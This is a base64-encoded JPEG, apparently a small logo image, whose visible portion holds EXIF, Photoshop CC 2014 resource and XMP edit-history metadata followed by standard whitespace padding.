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MC9tbS8iIHhtbG5zOnN0RXZ0PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTQgKFdpbmRvd3MpIiB4bXA6Q3JlYXRlRGF0ZT0iMjAxNC0wNy0xNVQwMjo1MDowMSswOTowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAxNC0wNy0xNVQwNDoxMTowOSswOTowMCIgeG1wOk1vZGlmeURhdGU9IjIwMTQtMDctMTVUMDQ6MTE6MDkrMDk6MDAiIGRjOmZvcm1hdD0iaW1hZ2UvanBlZyIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo4Yjk3NmM3ZC0yMWIzLTZhNDAtOTMzNC1mMjdkOTFmY2JlNTIiIHhtcE1NOkRvY3VtZW50SUQ9ImFkb2JlOmRvY2lkOnBob3Rvc2hvcDo5NzQ0Yzc0ZS0wYjhhLTExZTQtYWNmYy04ZTIyOGM5NDhiMGMiIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDo4YTczMmUwOS1iZGRjLTY1NDQtOTM0NS0zMjgyYmFhMTky
OTYiIHBob3Rvc2hvcDpDb2xvck1vZGU9IjMiIHBob3Rvc2hvcDpJQ0NQcm9maWxlPSJzUkdCIElFQzYxOTY2LTIuMSI+IDx4bXBNTTpIaXN0b3J5PiA8cmRmOlNlcT4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImNyZWF0ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6OGE3MzJlMDktYmRkYy02NTQ0LTkzNDUtMzI4MmJhYTE5Mjk2IiBzdEV2dDp3aGVuPSIyMDE0LTA3LTE1VDAyOjUwOjAxKzA5OjAwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgQ0MgMjAxNCAoV2luZG93cykiLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249InNhdmVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOjY4YmQyNmEzLTI2YjUtZTQ0My04ODdmLThlZTgwMDZkMzk2OCIgc3RFdnQ6d2hlbj0iMjAxNC0wNy0xNVQwMjo1MTozNCswOTowMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTQgKFdpbmRvd3MpIiBzdEV2dDpjaGFuZ2VkPSIvIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDozZGM3YWZlOC1jNDBiLTY5NGQtYWRlNC00M2U3NzY5NjA0NzYiIHN0RXZ0OndoZW49IjIwMTQtMDctMTVUMDQ6MTE6MDkrMDk6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0IChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iY29udmVydGVkIiBzdEV2dDpwYXJhbWV0ZXJzPSJmcm9tIGFwcGxpY2F0aW9uL3ZuZC5hZG9iZS5waG90b3Nob3AgdG8gaW1hZ2UvanBlZyIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iZGVyaXZlZCIgc3RFdnQ6cGFyYW1ldGVycz0iY29udmVydGVkIGZyb20gYXBwbGljYXRpb24vdm5kLmFkb2JlLnBob3Rvc2hvcCB0byBpbWFnZS9qcGVnIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Yjk3NmM3ZC0yMWIzLTZhNDAtOTMzNC1mMjdkOTFmY2JlNTIiIHN0RXZ0OndoZW49IjIwMTQtMDctMTVUMDQ6MTE6MDkrMDk6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0IChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6M2RjN2FmZTgtYzQwYi02OTRkLWFkZTQtNDNlNzc2OTYwNDc2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjhhNzMyZTA5LWJkZGMtNjU0NC05MzQ1LTMyODJiYWExOTI5NiIgc3RSZWY6b3JpZ2luYWxEb2N1bWVudElEPSJ4bXAuZGlkOjhhNzMyZTA5LWJkZGMtNjU0NC05MzQ1LTMyODJiYWExOTI5NiIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
